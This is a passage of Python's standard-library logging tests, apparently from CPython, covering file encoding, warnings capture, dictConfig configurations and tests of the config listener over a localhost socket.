        bar = logging.getLogger("foo")
        bar.debug(self.next_message())
        self.assert_log_lines([
            ('foo', 'DEBUG', '2'),
            ('foo', 'DEBUG', '3'),
        ])
class EncodingTest(BaseTest):
    def test_encoding_plain_file(self):
        # In Python 2.x, a plain file object is treated as having no encoding.
        log = logging.getLogger("test")
        fd, fn = tempfile.mkstemp(".log", "test_logging-1-")
        os.close(fd)
        # the non-ascii data we write to the log.
        data = "foo\x80"
        try:
            handler = logging.FileHandler(fn, encoding="utf-8")
            log.addHandler(handler)
            try:
                # write non-ascii data to the log.
                log.warning(data)
            finally:
                log.removeHandler(handler)
                handler.close()
            # check we wrote exactly those bytes, ignoring trailing \n etc
            f = open(fn, encoding="utf-8")
            try:
                self.assertEqual(f.read().rstrip(), data)
            finally:
                f.close()
        finally:
            # Always remove the temp file, even if an assertion failed.
            if os.path.isfile(fn):
                os.remove(fn)
    def test_encoding_cyrillic_unicode(self):
        log = logging.getLogger("test")
        # Get a message in Unicode: Do svidanya in Cyrillic (meaning goodbye)
        message = '\u0434\u043e \u0441\u0432\u0438\u0434\u0430\u043d\u0438\u044f'
        # Ensure it's written in a Cyrillic encoding
        writer_class = codecs.getwriter('cp1251')
        writer_class.encoding = 'cp1251'
        stream = io.BytesIO()
        writer = writer_class(stream, 'strict')
        handler = logging.StreamHandler(writer)
        log.addHandler(handler)
        try:
            log.warning(message)
        finally:
            log.removeHandler(handler)
            handler.close()
        # check we wrote exactly those bytes, ignoring trailing \n etc
        s = stream.getvalue()
        # Compare against what the data should be when encoded in CP-1251
        self.assertEqual(s, b'\xe4\xee \xf1\xe2\xe8\xe4\xe0\xed\xe8\xff\n')
class WarningsTest(BaseTest):
    def test_warnings(self):
        # captureWarnings(True) routes warnings to the 'py.warnings' logger.
        with warnings.catch_warnings():
            logging.captureWarnings(True)
            self.addCleanup(logging.captureWarnings, False)
            warnings.filterwarnings("always", category=UserWarning)
            stream = io.StringIO()
            h = logging.StreamHandler(stream)
            logger = logging.getLogger("py.warnings")
            logger.addHandler(h)
            warnings.warn("I'm warning you...")
            logger.removeHandler(h)
            s = stream.getvalue()
            h.close()
            self.assertGreater(s.find("UserWarning: I'm warning you...\n"), 0)
            # See if an explicit file uses the original implementation
            a_file = io.StringIO()
            warnings.showwarning("Explicit", UserWarning, "dummy.py", 42,
                                 a_file, "Dummy line")
            s = a_file.getvalue()
            a_file.close()
            self.assertEqual(s,
                "dummy.py:42: UserWarning: Explicit\n  Dummy line\n")
    def test_warnings_no_handlers(self):
        with warnings.catch_warnings():
            logging.captureWarnings(True)
            self.addCleanup(logging.captureWarnings, False)
            # confirm our assumption: no loggers are set
            logger = logging.getLogger("py.warnings")
            self.assertEqual(logger.handlers, [])
            # A NullHandler should be added automatically on first use.
            warnings.showwarning("Explicit", UserWarning, "dummy.py", 42)
            self.assertEqual(len(logger.handlers), 1)
            self.assertIsInstance(logger.handlers[0], logging.NullHandler)
def formatFunc(format, datefmt=None):
    """Formatter factory referenced by name from the config tests."""
    formatter = logging.Formatter(format, datefmt)
    return formatter
class myCustomFormatter:
    # Accepts Formatter-like constructor arguments but is NOT a
    # logging.Formatter subclass; presumably used by the config tests to
    # exercise custom-formatter handling — confirm against its usage.
    def __init__(self, fmt, datefmt=None):
        pass
def handlerFunc():
    """Handler factory used by the config tests: a fresh StreamHandler."""
    handler = logging.StreamHandler()
    return handler
class CustomHandler(logging.StreamHandler):
    # Trivial StreamHandler subclass, referenced by qualified name from
    # the config5/config6 dictionaries to exercise custom handler classes.
    pass
class ConfigDictTest(BaseTest):
"""Reading logging config from a dictionary."""
check_no_resource_warning = support.check_no_resource_warning
expected_log_pat = r"^(\w+) \+\+ (\w+)$"
# config0 is a standard configuration.
config0 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'root' : {
'level' : 'WARNING',
'handlers' : ['hand1'],
},
}
# config1 adds a little to the standard configuration.
config1 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# config1a moves the handler to the root. Used with config8a
config1a = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
},
},
'root' : {
'level' : 'WARNING',
'handlers' : ['hand1'],
},
}
# config2 has a subtle configuration error that should be reported
config2 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdbout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# As config1 but with a misspelt level on a handler
config2a = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NTOSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# As config1 but with a misspelt level on a logger
config2b = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WRANING',
},
}
# config3 has a less subtle configuration error
config3 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'misspelled_name',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# config4 specifies a custom formatter class to be loaded
config4 = {
    'version': 1,
    'formatters': {
        'form1' : {
            '()' : __name__ + '.ExceptionFormatter',
            'format' : '%(levelname)s:%(name)s:%(message)s',
        },
    },
    'handlers' : {
        'hand1' : {
            'class' : 'logging.StreamHandler',
            'formatter' : 'form1',
            'level' : 'NOTSET',
            'stream' : 'ext://sys.stdout',
        },
    },
    'root' : {
        'level' : 'NOTSET',
        'handlers' : ['hand1'],
    },
}
# As config4 but using an actual callable rather than a string
config4a = {
    'version': 1,
    'formatters': {
        'form1' : {
            '()' : ExceptionFormatter,
            'format' : '%(levelname)s:%(name)s:%(message)s',
        },
        'form2' : {
            '()' : __name__ + '.formatFunc',
            'format' : '%(levelname)s:%(name)s:%(message)s',
        },
        'form3' : {
            '()' : formatFunc,
            'format' : '%(levelname)s:%(name)s:%(message)s',
        },
    },
    'handlers' : {
        'hand1' : {
            'class' : 'logging.StreamHandler',
            'formatter' : 'form1',
            'level' : 'NOTSET',
            'stream' : 'ext://sys.stdout',
        },
        'hand2' : {
            '()' : handlerFunc,
        },
    },
    'root' : {
        'level' : 'NOTSET',
        'handlers' : ['hand1'],
    },
}
# config5 specifies a custom handler class to be loaded
config5 = {
    'version': 1,
    'formatters': {
        'form1' : {
            'format' : '%(levelname)s ++ %(message)s',
        },
    },
    'handlers' : {
        'hand1' : {
            'class' : __name__ + '.CustomHandler',
            'formatter' : 'form1',
            'level' : 'NOTSET',
            'stream' : 'ext://sys.stdout',
        },
    },
    'loggers' : {
        'compiler.parser' : {
            'level' : 'DEBUG',
            'handlers' : ['hand1'],
        },
    },
    'root' : {
        'level' : 'WARNING',
    },
}
# config6 specifies a custom handler class to be loaded
# but has bad arguments
config6 = {
    'version': 1,
    'formatters': {
        'form1' : {
            'format' : '%(levelname)s ++ %(message)s',
        },
    },
    'handlers' : {
        'hand1' : {
            'class' : __name__ + '.CustomHandler',
            'formatter' : 'form1',
            'level' : 'NOTSET',
            'stream' : 'ext://sys.stdout',
            '9' : 'invalid parameter name',
        },
    },
    'loggers' : {
        'compiler.parser' : {
            'level' : 'DEBUG',
            'handlers' : ['hand1'],
        },
    },
    'root' : {
        'level' : 'WARNING',
    },
}
# config 7 does not define compiler.parser but defines compiler.lexer
# so compiler.parser should be disabled after applying it
config7 = {
    'version': 1,
    'formatters': {
        'form1' : {
            'format' : '%(levelname)s ++ %(message)s',
        },
    },
    'handlers' : {
        'hand1' : {
            'class' : 'logging.StreamHandler',
            'formatter' : 'form1',
            'level' : 'NOTSET',
            'stream' : 'ext://sys.stdout',
        },
    },
    'loggers' : {
        'compiler.lexer' : {
            'level' : 'DEBUG',
            'handlers' : ['hand1'],
        },
    },
    'root' : {
        'level' : 'WARNING',
    },
}
# config8 defines both compiler and compiler.lexer
# so compiler.parser should not be disabled (since
# compiler is defined)
config8 = {
    'version': 1,
    'disable_existing_loggers' : False,
    'formatters': {
        'form1' : {
            'format' : '%(levelname)s ++ %(message)s',
        },
    },
    'handlers' : {
        'hand1' : {
            'class' : 'logging.StreamHandler',
            'formatter' : 'form1',
            'level' : 'NOTSET',
            'stream' : 'ext://sys.stdout',
        },
    },
    'loggers' : {
        'compiler' : {
            'level' : 'DEBUG',
            'handlers' : ['hand1'],
        },
        'compiler.lexer' : {
        },
    },
    'root' : {
        'level' : 'WARNING',
    },
}
# config8a disables existing loggers
config8a = {
    'version': 1,
    'disable_existing_loggers' : True,
    'formatters': {
        'form1' : {
            'format' : '%(levelname)s ++ %(message)s',
        },
    },
    'handlers' : {
        'hand1' : {
            'class' : 'logging.StreamHandler',
            'formatter' : 'form1',
            'level' : 'NOTSET',
            'stream' : 'ext://sys.stdout',
        },
    },
    'loggers' : {
        'compiler' : {
            'level' : 'DEBUG',
            'handlers' : ['hand1'],
        },
        'compiler.lexer' : {
        },
    },
    'root' : {
        'level' : 'WARNING',
    },
}
# config9 sets handler and logger levels to WARNING, so INFO records
# are dropped; config9a/config9b below adjust the levels incrementally.
config9 = {
    'version': 1,
    'formatters': {
        'form1' : {
            'format' : '%(levelname)s ++ %(message)s',
        },
    },
    'handlers' : {
        'hand1' : {
            'class' : 'logging.StreamHandler',
            'formatter' : 'form1',
            'level' : 'WARNING',
            'stream' : 'ext://sys.stdout',
        },
    },
    'loggers' : {
        'compiler.parser' : {
            'level' : 'WARNING',
            'handlers' : ['hand1'],
        },
    },
    'root' : {
        'level' : 'NOTSET',
    },
}
# Incremental update to config9: lowers the logger level only, so the
# handler (still WARNING) continues to drop INFO records.
config9a = {
    'version': 1,
    'incremental' : True,
    'handlers' : {
        'hand1' : {
            'level' : 'WARNING',
        },
    },
    'loggers' : {
        'compiler.parser' : {
            'level' : 'INFO',
        },
    },
}
# Incremental update to config9a: also lowers the handler level, so
# INFO records finally get through.
config9b = {
    'version': 1,
    'incremental' : True,
    'handlers' : {
        'hand1' : {
            'level' : 'INFO',
        },
    },
    'loggers' : {
        'compiler.parser' : {
            'level' : 'INFO',
        },
    },
}
# As config1 but with a filter added
config10 = {
    'version': 1,
    'formatters': {
        'form1' : {
            'format' : '%(levelname)s ++ %(message)s',
        },
    },
    'filters' : {
        'filt1' : {
            'name' : 'compiler.parser',
        },
    },
    'handlers' : {
        'hand1' : {
            'class' : 'logging.StreamHandler',
            'formatter' : 'form1',
            'level' : 'NOTSET',
            'stream' : 'ext://sys.stdout',
            'filters' : ['filt1'],
        },
    },
    'loggers' : {
        'compiler.parser' : {
            'level' : 'DEBUG',
            'filters' : ['filt1'],
        },
    },
    'root' : {
        'level' : 'WARNING',
        'handlers' : ['hand1'],
    },
}
# As config1 but using cfg:// references
config11 = {
    'version': 1,
    'true_formatters': {
        'form1' : {
            'format' : '%(levelname)s ++ %(message)s',
        },
    },
    'handler_configs': {
        'hand1' : {
            'class' : 'logging.StreamHandler',
            'formatter' : 'form1',
            'level' : 'NOTSET',
            'stream' : 'ext://sys.stdout',
        },
    },
    'formatters' : 'cfg://true_formatters',
    'handlers' : {
        'hand1' : 'cfg://handler_configs[hand1]',
    },
    'loggers' : {
        'compiler.parser' : {
            'level' : 'DEBUG',
            'handlers' : ['hand1'],
        },
    },
    'root' : {
        'level' : 'WARNING',
    },
}
# As config11 but missing the version key
config12 = {
    'true_formatters': {
        'form1' : {
            'format' : '%(levelname)s ++ %(message)s',
        },
    },
    'handler_configs': {
        'hand1' : {
            'class' : 'logging.StreamHandler',
            'formatter' : 'form1',
            'level' : 'NOTSET',
            'stream' : 'ext://sys.stdout',
        },
    },
    'formatters' : 'cfg://true_formatters',
    'handlers' : {
        'hand1' : 'cfg://handler_configs[hand1]',
    },
    'loggers' : {
        'compiler.parser' : {
            'level' : 'DEBUG',
            'handlers' : ['hand1'],
        },
    },
    'root' : {
        'level' : 'WARNING',
    },
}
# As config11 but using an unsupported version
config13 = {
    'version': 2,
    'true_formatters': {
        'form1' : {
            'format' : '%(levelname)s ++ %(message)s',
        },
    },
    'handler_configs': {
        'hand1' : {
            'class' : 'logging.StreamHandler',
            'formatter' : 'form1',
            'level' : 'NOTSET',
            'stream' : 'ext://sys.stdout',
        },
    },
    'formatters' : 'cfg://true_formatters',
    'handlers' : {
        'hand1' : 'cfg://handler_configs[hand1]',
    },
    'loggers' : {
        'compiler.parser' : {
            'level' : 'DEBUG',
            'handlers' : ['hand1'],
        },
    },
    'root' : {
        'level' : 'WARNING',
    },
}
# As config0, but with properties ('.' maps attribute names to values
# set directly on the constructed handler instance)
config14 = {
    'version': 1,
    'formatters': {
        'form1' : {
            'format' : '%(levelname)s ++ %(message)s',
        },
    },
    'handlers' : {
        'hand1' : {
            'class' : 'logging.StreamHandler',
            'formatter' : 'form1',
            'level' : 'NOTSET',
            'stream' : 'ext://sys.stdout',
            '.': {
                'foo': 'bar',
                'terminator': '!\n',
            }
        },
    },
    'root' : {
        'level' : 'WARNING',
        'handlers' : ['hand1'],
    },
}
# A handler ('bufferGlobal') refers to another handler ('fileGlobal')
# defined later, and the formatter's '$' style doesn't match its
# %-style format string — used to test out-of-order resolution and
# format validation failures.
out_of_order = {
    "version": 1,
    "formatters": {
        "mySimpleFormatter": {
            "format": "%(asctime)s (%(name)s) %(levelname)s: %(message)s",
            "style": "$"
        }
    },
    "handlers": {
        "fileGlobal": {
            "class": "logging.StreamHandler",
            "level": "DEBUG",
            "formatter": "mySimpleFormatter"
        },
        "bufferGlobal": {
            "class": "logging.handlers.MemoryHandler",
            "capacity": 5,
            "formatter": "mySimpleFormatter",
            "target": "fileGlobal",
            "level": "DEBUG"
        }
    },
    "loggers": {
        "mymodule": {
            "level": "DEBUG",
            "handlers": ["bufferGlobal"],
            "propagate": "true"
        }
    }
}
# Configuration with custom logging.Formatter subclass as '()' key and 'validate' set to False
custom_formatter_class_validate = {
    'version': 1,
    'formatters': {
        'form1': {
            '()': __name__ + '.ExceptionFormatter',
            'format': '%(levelname)s:%(name)s:%(message)s',
            'validate': False,
        },
    },
    'handlers' : {
        'hand1' : {
            'class': 'logging.StreamHandler',
            'formatter': 'form1',
            'level': 'NOTSET',
            'stream': 'ext://sys.stdout',
        },
    },
    "loggers": {
        "my_test_logger_custom_formatter": {
            "level": "DEBUG",
            "handlers": ["hand1"],
            "propagate": "true"
        }
    }
}
# Configuration with custom logging.Formatter subclass as 'class' key and 'validate' set to False
custom_formatter_class_validate2 = {
    'version': 1,
    'formatters': {
        'form1': {
            'class': __name__ + '.ExceptionFormatter',
            'format': '%(levelname)s:%(name)s:%(message)s',
            'validate': False,
        },
    },
    'handlers' : {
        'hand1' : {
            'class': 'logging.StreamHandler',
            'formatter': 'form1',
            'level': 'NOTSET',
            'stream': 'ext://sys.stdout',
        },
    },
    "loggers": {
        "my_test_logger_custom_formatter": {
            "level": "DEBUG",
            "handlers": ["hand1"],
            "propagate": "true"
        }
    }
}
# Configuration with custom class that is not inherited from logging.Formatter
custom_formatter_class_validate3 = {
    'version': 1,
    'formatters': {
        'form1': {
            'class': __name__ + '.myCustomFormatter',
            'format': '%(levelname)s:%(name)s:%(message)s',
            'validate': False,
        },
    },
    'handlers' : {
        'hand1' : {
            'class': 'logging.StreamHandler',
            'formatter': 'form1',
            'level': 'NOTSET',
            'stream': 'ext://sys.stdout',
        },
    },
    "loggers": {
        "my_test_logger_custom_formatter": {
            "level": "DEBUG",
            "handlers": ["hand1"],
            "propagate": "true"
        }
    }
}
# Configuration with custom function and 'validate' set to False
custom_formatter_with_function = {
    'version': 1,
    'formatters': {
        'form1': {
            '()': formatFunc,
            'format': '%(levelname)s:%(name)s:%(message)s',
            'validate': False,
        },
    },
    'handlers' : {
        'hand1' : {
            'class': 'logging.StreamHandler',
            'formatter': 'form1',
            'level': 'NOTSET',
            'stream': 'ext://sys.stdout',
        },
    },
    "loggers": {
        "my_test_logger_custom_formatter": {
            "level": "DEBUG",
            "handlers": ["hand1"],
            "propagate": "true"
        }
    }
}
def apply_config(self, conf):
    """Apply a dict-based configuration via logging.config.dictConfig()."""
    logging.config.dictConfig(conf)

def test_config0_ok(self):
    """A simple config which overrides the default settings."""
    with support.captured_stdout() as output:
        self.apply_config(self.config0)
        logger = logging.getLogger()
        # Won't output anything
        logger.info(self.next_message())
        # Outputs a message
        logger.error(self.next_message())
        self.assert_log_lines([
            ('ERROR', '2'),
        ], stream=output)
        # Original logger output is empty.
        self.assert_log_lines([])

def test_config1_ok(self, config=config1):
    """A config defining a sub-parser as well.

    Also reused by other tests via the ``config`` parameter.
    """
    with support.captured_stdout() as output:
        self.apply_config(config)
        logger = logging.getLogger("compiler.parser")
        # Both will output a message
        logger.info(self.next_message())
        logger.error(self.next_message())
        self.assert_log_lines([
            ('INFO', '1'),
            ('ERROR', '2'),
        ], stream=output)
        # Original logger output is empty.
        self.assert_log_lines([])

def test_config2_failure(self):
    """config2 is malformed, so applying it must raise."""
    self.assertRaises(Exception, self.apply_config, self.config2)

def test_config2a_failure(self):
    """config2a is malformed, so applying it must raise."""
    self.assertRaises(Exception, self.apply_config, self.config2a)

def test_config2b_failure(self):
    """config2b is malformed, so applying it must raise."""
    self.assertRaises(Exception, self.apply_config, self.config2b)

def test_config3_failure(self):
    """config3 references a misspelled formatter, so applying it must raise."""
    self.assertRaises(Exception, self.apply_config, self.config3)
def test_config4_ok(self):
    """A config specifying a custom formatter class (by dotted name)."""
    with support.captured_stdout() as output:
        self.apply_config(self.config4)
        #logger = logging.getLogger()
        try:
            raise RuntimeError()
        except RuntimeError:
            logging.exception("just testing")
        sys.stdout.seek(0)
        self.assertEqual(output.getvalue(),
            "ERROR:root:just testing\nGot a [RuntimeError]\n")
        # Original logger output is empty
        self.assert_log_lines([])

def test_config4a_ok(self):
    """A config specifying a custom formatter class (as an actual callable)."""
    with support.captured_stdout() as output:
        self.apply_config(self.config4a)
        #logger = logging.getLogger()
        try:
            raise RuntimeError()
        except RuntimeError:
            logging.exception("just testing")
        sys.stdout.seek(0)
        self.assertEqual(output.getvalue(),
            "ERROR:root:just testing\nGot a [RuntimeError]\n")
        # Original logger output is empty
        self.assert_log_lines([])

def test_config5_ok(self):
    """config5 (custom handler class) behaves just like config1."""
    self.test_config1_ok(config=self.config5)

def test_config6_failure(self):
    """config6 passes an invalid parameter name to the handler, so it must raise."""
    self.assertRaises(Exception, self.apply_config, self.config6)
def test_config7_ok(self):
    """Applying config7 after config1 should disable compiler.parser,
    because config7 defines compiler.lexer but not compiler.parser."""
    with support.captured_stdout() as output:
        self.apply_config(self.config1)
        logger = logging.getLogger("compiler.parser")
        # Both will output a message
        logger.info(self.next_message())
        logger.error(self.next_message())
        self.assert_log_lines([
            ('INFO', '1'),
            ('ERROR', '2'),
        ], stream=output)
        # Original logger output is empty.
        self.assert_log_lines([])
    with support.captured_stdout() as output:
        self.apply_config(self.config7)
        logger = logging.getLogger("compiler.parser")
        self.assertTrue(logger.disabled)
        logger = logging.getLogger("compiler.lexer")
        # Both will output a message
        logger.info(self.next_message())
        logger.error(self.next_message())
        self.assert_log_lines([
            ('INFO', '3'),
            ('ERROR', '4'),
        ], stream=output)
        # Original logger output is empty.
        self.assert_log_lines([])

# Same as test_config_7_ok but don't disable old loggers.
def test_config_8_ok(self):
    """config8 defines 'compiler', so compiler.parser must stay enabled."""
    with support.captured_stdout() as output:
        self.apply_config(self.config1)
        logger = logging.getLogger("compiler.parser")
        # All will output a message
        logger.info(self.next_message())
        logger.error(self.next_message())
        self.assert_log_lines([
            ('INFO', '1'),
            ('ERROR', '2'),
        ], stream=output)
        # Original logger output is empty.
        self.assert_log_lines([])
    with support.captured_stdout() as output:
        self.apply_config(self.config8)
        logger = logging.getLogger("compiler.parser")
        self.assertFalse(logger.disabled)
        # Both will output a message
        logger.info(self.next_message())
        logger.error(self.next_message())
        logger = logging.getLogger("compiler.lexer")
        # Both will output a message
        logger.info(self.next_message())
        logger.error(self.next_message())
        self.assert_log_lines([
            ('INFO', '3'),
            ('ERROR', '4'),
            ('INFO', '5'),
            ('ERROR', '6'),
        ], stream=output)
        # Original logger output is empty.
        self.assert_log_lines([])
def test_config_8a_ok(self):
    """config8a sets disable_existing_loggers, so loggers not named in
    it (e.g. compiler-hyphenated) must go silent after it is applied."""
    with support.captured_stdout() as output:
        self.apply_config(self.config1a)
        logger = logging.getLogger("compiler.parser")
        # See issue #11424. compiler-hyphenated sorts
        # between compiler and compiler.xyz and this
        # was preventing compiler.xyz from being included
        # in the child loggers of compiler because of an
        # overzealous loop termination condition.
        hyphenated = logging.getLogger('compiler-hyphenated')
        # All will output a message
        logger.info(self.next_message())
        logger.error(self.next_message())
        hyphenated.critical(self.next_message())
        self.assert_log_lines([
            ('INFO', '1'),
            ('ERROR', '2'),
            ('CRITICAL', '3'),
        ], stream=output)
        # Original logger output is empty.
        self.assert_log_lines([])
    with support.captured_stdout() as output:
        self.apply_config(self.config8a)
        logger = logging.getLogger("compiler.parser")
        self.assertFalse(logger.disabled)
        # Both will output a message
        logger.info(self.next_message())
        logger.error(self.next_message())
        logger = logging.getLogger("compiler.lexer")
        # Both will output a message
        logger.info(self.next_message())
        logger.error(self.next_message())
        # Will not appear
        hyphenated.critical(self.next_message())
        self.assert_log_lines([
            ('INFO', '4'),
            ('ERROR', '5'),
            ('INFO', '6'),
            ('ERROR', '7'),
        ], stream=output)
        # Original logger output is empty.
        self.assert_log_lines([])

def test_config_9_ok(self):
    """Incremental configs (config9a/9b) adjust levels without replacing objects."""
    with support.captured_stdout() as output:
        self.apply_config(self.config9)
        logger = logging.getLogger("compiler.parser")
        # Nothing will be output since both handler and logger are set to WARNING
        logger.info(self.next_message())
        self.assert_log_lines([], stream=output)
        self.apply_config(self.config9a)
        # Nothing will be output since handler is still set to WARNING
        logger.info(self.next_message())
        self.assert_log_lines([], stream=output)
        self.apply_config(self.config9b)
        # Message should now be output
        logger.info(self.next_message())
        self.assert_log_lines([
            ('INFO', '3'),
        ], stream=output)
def test_config_10_ok(self):
    """config10's filter ('compiler.parser') must pass only records from
    that logger subtree through the handler."""
    with support.captured_stdout() as output:
        self.apply_config(self.config10)
        logger = logging.getLogger("compiler.parser")
        logger.warning(self.next_message())
        logger = logging.getLogger('compiler')
        # Not output, because filtered
        logger.warning(self.next_message())
        logger = logging.getLogger('compiler.lexer')
        # Not output, because filtered
        logger.warning(self.next_message())
        logger = logging.getLogger("compiler.parser.codegen")
        # Output, as not filtered
        logger.error(self.next_message())
        self.assert_log_lines([
            ('WARNING', '1'),
            ('ERROR', '4'),
        ], stream=output)

def test_config11_ok(self):
    """config11 (cfg:// references) behaves just like config1."""
    self.test_config1_ok(self.config11)

def test_config12_failure(self):
    """config12 is missing the 'version' key, so applying it must raise."""
    self.assertRaises(Exception, self.apply_config, self.config12)

def test_config13_failure(self):
    """config13 uses an unsupported version, so applying it must raise."""
    self.assertRaises(Exception, self.apply_config, self.config13)

def test_config14_ok(self):
    """config14's '.' section must set plain attributes on the handler."""
    with support.captured_stdout() as output:
        self.apply_config(self.config14)
        h = logging._handlers['hand1']
        self.assertEqual(h.foo, 'bar')
        self.assertEqual(h.terminator, '!\n')
        logging.warning('Exclamation')
        self.assertTrue(output.getvalue().endswith('Exclamation!\n'))

def test_config15_ok(self):
    """Re-applying a FileHandler config must not leak the old stream
    (no ResourceWarning)."""

    def cleanup(h1, fn):
        h1.close()
        os.remove(fn)

    with self.check_no_resource_warning():
        fd, fn = tempfile.mkstemp(".log", "test_logging-X-")
        os.close(fd)

        config = {
            "version": 1,
            "handlers": {
                "file": {
                    "class": "logging.FileHandler",
                    "filename": fn
                }
            },
            "root": {
                "handlers": ["file"]
            }
        }

        self.apply_config(config)
        self.apply_config(config)

    handler = logging.root.handlers[0]
    self.addCleanup(cleanup, handler, fn)
def setup_via_listener(self, text, verify=None):
    """Send a length-prefixed config ``text`` to a logging.config.listen()
    server on an ephemeral port, then shut the listener down.

    ``verify``, if given, is passed through to listen() to vet/transform
    the received bytes.
    """
    text = text.encode("utf-8")
    # Ask for a randomly assigned port (by using port 0)
    t = logging.config.listen(0, verify)
    t.start()
    t.ready.wait()
    # Now get the port allocated
    port = t.port
    t.ready.clear()
    try:
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.settimeout(2.0)
        sock.connect(('localhost', port))

        # Wire format: 4-byte big-endian length prefix, then the payload.
        slen = struct.pack('>L', len(text))
        s = slen + text
        sentsofar = 0
        left = len(s)
        # send() may transmit only part of the buffer; loop until done.
        while left > 0:
            sent = sock.send(s[sentsofar:])
            sentsofar += sent
            left -= sent
        sock.close()
    finally:
        t.ready.wait(2.0)
        logging.config.stopListening()
        support.join_thread(t)

def test_listen_config_10_ok(self):
    """config10 delivered over the listener socket behaves as when applied directly."""
    with support.captured_stdout() as output:
        self.setup_via_listener(json.dumps(self.config10))
        logger = logging.getLogger("compiler.parser")
        logger.warning(self.next_message())
        logger = logging.getLogger('compiler')
        # Not output, because filtered
        logger.warning(self.next_message())
        logger = logging.getLogger('compiler.lexer')
        # Not output, because filtered
        logger.warning(self.next_message())
        logger = logging.getLogger("compiler.parser.codegen")
        # Output, as not filtered
        logger.error(self.next_message())
        self.assert_log_lines([
            ('WARNING', '1'),
            ('ERROR', '4'),
        ], stream=output)

def test_listen_config_1_ok(self):
    """An ini-format config delivered over the listener socket works too."""
    with support.captured_stdout() as output:
        self.setup_via_listener(textwrap.dedent(ConfigFileTest.config1))
        logger = logging.getLogger("compiler.parser")
        # Both will output a message
        logger.info(self.next_message())
        logger.error(self.next_message())
        self.assert_log_lines([
            ('INFO', '1'),
            ('ERROR', '2'),
        ], stream=output)
        # Original logger output is empty.
        self.assert_log_lines([])
def test_listen_verify(self):
    """Exercise the listener's verify callback: rejecting, absent, and
    transforming (reversing) the received config bytes."""

    def verify_fail(stuff):
        # Returning None rejects the received config.
        return None

    def verify_reverse(stuff):
        # Reverse the bytes back into a valid config.
        return stuff[::-1]

    logger = logging.getLogger("compiler.parser")
    to_send = textwrap.dedent(ConfigFileTest.config1)

    # First, specify a verification function that will fail.
    # We expect to see no output, since our configuration
    # never took effect.
    with support.captured_stdout() as output:
        self.setup_via_listener(to_send, verify_fail)
        # Both will output a message
        logger.info(self.next_message())
        logger.error(self.next_message())
    self.assert_log_lines([], stream=output)
    # Original logger output has the stuff we logged.
    self.assert_log_lines([
        ('INFO', '1'),
        ('ERROR', '2'),
    ], pat=r"^[\w.]+ -> (\w+): (\d+)$")

    # Now, perform no verification. Our configuration
    # should take effect.
    with support.captured_stdout() as output:
        self.setup_via_listener(to_send)    # no verify callable specified
        logger = logging.getLogger("compiler.parser")
        # Both will output a message
        logger.info(self.next_message())
        logger.error(self.next_message())
    self.assert_log_lines([
        ('INFO', '3'),
        ('ERROR', '4'),
    ], stream=output)
    # Original logger output still has the stuff we logged before.
    self.assert_log_lines([
        ('INFO', '1'),
        ('ERROR', '2'),
    ], pat=r"^[\w.]+ -> (\w+): (\d+)$")

    # Now, perform verification which transforms the bytes.
    with support.captured_stdout() as output:
        self.setup_via_listener(to_send[::-1], verify_reverse)
        logger = logging.getLogger("compiler.parser")
        # Both will output a message
        logger.info(self.next_message())
        logger.error(self.next_message())
    self.assert_log_lines([
        ('INFO', '5'),
        ('ERROR', '6'),
    ], stream=output)
    # Original logger output still has the stuff we logged before.
    self.assert_log_lines([
        ('INFO', '1'),
        ('ERROR', '2'),
    ], pat=r"^[\w.]+ -> (\w+): (\d+)$")

def test_out_of_order(self):
    """The out_of_order config's mismatched '$' style must be rejected."""
    self.assertRaises(ValueError, self.apply_config, self.out_of_order)

def test_out_of_order_with_dollar_style(self):
    """With a genuine $-style format string, out_of_order must apply cleanly
    and resolve the forward handler reference."""
    config = copy.deepcopy(self.out_of_order)
    config['formatters']['mySimpleFormatter']['format'] = "${asctime} (${name}) ${levelname}: ${message}"

    self.apply_config(config)
    handler = logging.getLogger('mymodule').handlers[0]
    self.assertIsInstance(handler.target, logging.Handler)
    self.assertIsInstance(handler.formatter._style,
                          logging.StringTemplateStyle)

def test_custom_formatter_class_with_validate(self):
    """A custom Formatter subclass via '()' with validate=False is accepted."""
